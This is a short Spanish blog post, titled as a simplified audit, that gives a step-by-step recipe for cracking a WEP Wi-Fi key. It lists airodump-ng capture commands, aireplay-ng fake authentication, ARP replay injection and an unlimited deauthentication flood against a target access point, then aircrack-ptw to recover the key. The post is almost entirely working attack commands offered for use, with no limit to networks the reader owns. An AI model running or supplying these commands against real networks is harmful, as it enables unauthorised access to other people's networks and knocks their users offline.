Auditoria simplificada
Primero anotar la siguiente información:
- canal del AP
- nombre del AP
- Dirección MAC del AP
En la consola teclear los siguientes comandos:
#airodump-ng -w [nombre captura??] -c12 wlan0
en donde -c12 corresponde al número del canal y wlan0 al tipo de antena que se está utilizando (alfa network 1). Para otros casos, puede ser ath0 cuando se utiliza, por ejemplo, una tarjeta PCMCIA.
Luego proceder a abrir otras consolas y teclear los siguientes comandos ... todavía sin teclear enter.
#aireplay-ng wlan0 --fakeauth 135 -e [nombre AP] -a [MAC AP] -h [mi MAC]
#aireplay-ng wlan0 --arpreplay -e [nombre AP] -b [MAC AP] -h [mi MAC] -x 1000
#aireplay-ng wlan0 --deauth 0 -e [nombre AP] -a [MAC AP] -h [mi MAC]
Finalmente presionamos a todas enter y listo. A capturar IVs cuando sea posible.
Para obtener la clave:
#aircrack-ptw nombre captura??.cap
esperamos un rato y
key found!
0 comentarios:
Publicar un comentario en la entrada